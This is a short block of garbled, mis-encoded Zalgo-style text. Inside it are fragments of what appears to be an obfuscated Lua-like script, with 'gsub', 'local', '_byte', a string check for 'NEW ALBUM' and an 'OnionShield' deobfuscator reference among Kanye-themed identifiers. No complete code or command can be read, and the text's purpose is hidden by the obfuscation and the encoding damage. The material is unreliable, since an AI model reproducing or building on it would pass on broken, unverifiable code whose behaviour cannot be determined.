Ì¦Ì¢ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­,Ì´Í—ÌŽÌÌ‹ÌšÌ½Í•Í‰Ì¹ÍœÍœÌ¬Ì»mÌ¶Í›Ì»Ì–Ì¼Ì«ÌŸÌ¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì·ÍŠÌ‘ÌÌ½Ì‚Ì ÌŸÌ—Ì­Ì®Ì§Ì¹Ì¹Ì˜Í”wÌ¸Í›Í‘Ì‰Í˜Ì¨Ì§Ì Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌ,Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌ¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­.$Ì·Í›Í‚ÍÌ†ÍÍÌ’Í’Ì¦NÌµÌŠÍ—Ì¾ÍŠÍ„ÍŽÌ·Ì‘Í‚Ì Ì¢Í‰Ì£ÌžÌ°ÍÌ«EÌµÍÌ³ÌºÍÌ£ÌžÌ­Í”ÍÌ¢ÍˆÌµÌ‡ÍŠÌˆÍ’Ì¹Ì Ì¦Ì±Ì°Ì Ì¦WÌ´Í‚ÍÌŒÌ½Ì¾Ì€Ì–Í“ÌºÌ¯Ì™Ì¶ÌƒÌÌ³ÌºÍšÌªÍ‰Ì©AÌ¸Í Ì”ÌÍ™Ì°Ì«ÌžÌ·Í‘Í—ÌªÌ§ÌœÍ”ÍˆÌÌ­LÌ´Ì„Ì”ÌÌÍ‹ÌŒÍ‚ÌÍ“Ì™ÍœÌ¡Ì£ÍŽÌ®Ì°Ì¶Ì€Í„Ì•ÌÍ—Ì›ÌÌ¬Ì¹Ì—Ì²Ì­Í‡Í–BÌµÌƒÍŒÌ•Í˜Ì¹Í–Ì²Í‰Í–Í•Ì¸Ì‡Í‚Ì©Í…Í•ÍˆÌ²Ì³Ì³ÍŽÍ”Ì UÌ·Í˜Ì½ÌŒÌˆÍÍŽÍ™Ì·Í˜ÌšÌ­MÌ¶Í˜Í‚ÍÌ­ÌªÍ‰ÌºÌ¬Ì£Í“$,gÌµÍÌ‘ÍÌ¿Í‘ÍˆÌœÌ³Ì¹ÌžÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™Ì¶ÍÌšÌ½ÌšÌÌžbÌ´Í†Í„Ì›ÌƒÌ“Ì…Í‚Ì„ÍƒÍ‘Ì¹;Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“ÌµÌÌˆÍ—ÌŸÌŸÌ±Ì¹Í•ÌœÌŸÌ¨Í‡Ì—cÌµÌÌ›Í„ÌšÌ‹ÌŠÍ“Ì­Ì¯ÍÍÍ™Ì¨ÍˆÌ¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢_Ì¶ÍÌšÌ½ÌšÌÌžbÌ´Í†Í„Ì›ÌƒÌ“Ì…Í‚Ì„ÍƒÍ‘Ì¹Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­[Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­,Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨,Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™Ì¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨], Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥ [ÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®Ì¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­,Ì´Í—ÌŽÌÌ‹ÌšÌ½Í•Í‰Ì¹ÍœÍœÌ¬Ì»mÌ¶Í›Ì»Ì–Ì¼Ì«ÌŸÌ´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥Ì·ÍŠÌ‘ÌÌ½Ì‚Ì ÌŸÌ—Ì­Ì®Ì§Ì¹Ì¹Ì˜Í”wÌ¸Í›Í‘Ì‰Í˜Ì¨Ì§Ì Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌ,Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®Ì¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­] == "Ì·Í›Í‚ÍÌ†ÍÍÌ’Í’Ì¦NÌµÌŠÍ—Ì¾ÍŠÍ„ÍŽÌ·Ì‘Í‚Ì Ì¢Í‰Ì£ÌžÌ°ÍÌ«EÌµÍÌ³ÌºÍÌ£ÌžÌ­Í”ÍÌ¢ÍˆÌµÌ‡ÍŠÌˆÍ’Ì¹Ì Ì¦Ì±Ì°Ì Ì¦WÌ´Í‚ÍÌŒÌ½Ì¾Ì€Ì–Í“ÌºÌ¯Ì™ Ì¶ÌƒÌÌ³ÌºÍšÌªÍ‰Ì©AÌ¸Í Ì”ÌÍ™Ì°Ì«ÌžÌ·Í‘Í—ÌªÌ§ÌœÍ”ÍˆÌÌ­LÌ´Ì„Ì”ÌÌÍ‹ÌŒÍ‚ÌÍ“Ì™ÍœÌ¡Ì£ÍŽÌ®Ì°Ì¶Ì€Í„Ì•ÌÍ—Ì›ÌÌ¬Ì¹Ì—Ì²Ì­Í‡Í–BÌµÌƒÍŒÌ•Í˜Ì¹Í–Ì²Í‰Í–Í•Ì¸Ì‡Í‚Ì©Í…Í•ÍˆÌ²Ì³Ì³ÍŽÍ”Ì UÌ·Í˜Ì½ÌŒÌˆÍÍŽÍ™Ì·Í˜ÌšÌ­MÌ¶Í˜Í‚ÍÌ­ÌªÍ‰ÌºÌ¬Ì£Í“" Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì·ÌÍ—Ì‡ÌžÌ³Ì˜Ì¢Ì¦iÌ·ÍƒÌÍÍ‚Ì»Ì­ÌÌºÌ¼Ì§Ì¢Ì·ÌÌ“Í’ÍŒÍ Ì¨Ì»fÌ¸Í„Í›ÌœÍˆÍ•Ì© {Ì´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì¶ÍÌšÌ½ÌšÌÌžbÌ´Í†Í„Ì›ÌƒÌ“Ì…Í‚Ì„ÍƒÍ‘Ì¹Ì·ÌÌ“Í’ÍŒÍ Ì¨Ì»fÌ¸Í„Í›ÌœÍˆÍ•Ì©Ì´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™Ì¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨ÌµÌÌˆÍ—ÌŸÌŸÌ±Ì¹Í•ÌœÌŸÌ¨Í‡Ì—cÌµÌÌ›Í„ÌšÌ‹ÌŠÍ“Ì­Ì¯ÍÍÍ™Ì¨ÍˆÌ¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌÌ¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥.ÌµÌÌˆÍ—ÌŸÌŸÌ±Ì¹Í•ÌœÌŸÌ¨Í‡Ì—cÌµÌÌ›Í„ÌšÌ‹ÌŠÍ“Ì­Ì¯ÍÍÍ™Ì¨ÍˆÌ¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ = Ì¶Ì‚Í„ÌÌŽÍ›ÌÍ‹Ì›Í„Ì³Ì²ÌÌ Í“Í–OÌ·ÌÌ‰Ì„ÌŽÌˆÍÌªÌ®Ì¤Ì¢Ì¥ÌºÌ°Ì°ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì·ÌÍ—Ì‡ÌžÌ³Ì˜Ì¢Ì¦iÌ·ÍƒÌÍÍ‚Ì»Ì­ÌÌºÌ¼Ì§Ì¢ÌµÌ†Ì…ÌÌ—Ì™Ì Ì­Ì˜SÌ¶ÌÍ†Ì¿Ì†Í€Ì ÌžÌ˜Ì¦Ì¯Ì¼Ì£Ì¥Ì©Ì®Ì·Í’Ì€Ì¥Í‰Ì ÍŽÌ°ÍšÌ¯Í”hÌ·Ì’Í“ÍœÌ«Ì¬ÍšÌ¹Í“Í…Ì¢Ì²Ì·ÌÍ—Ì‡ÌžÌ³Ì˜Ì¢Ì¦iÌ·ÍƒÌÍÍ‚Ì»Ì­ÌÌºÌ¼Ì§Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­Ìº_Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦,Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨,Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦Ì´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨.ÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ 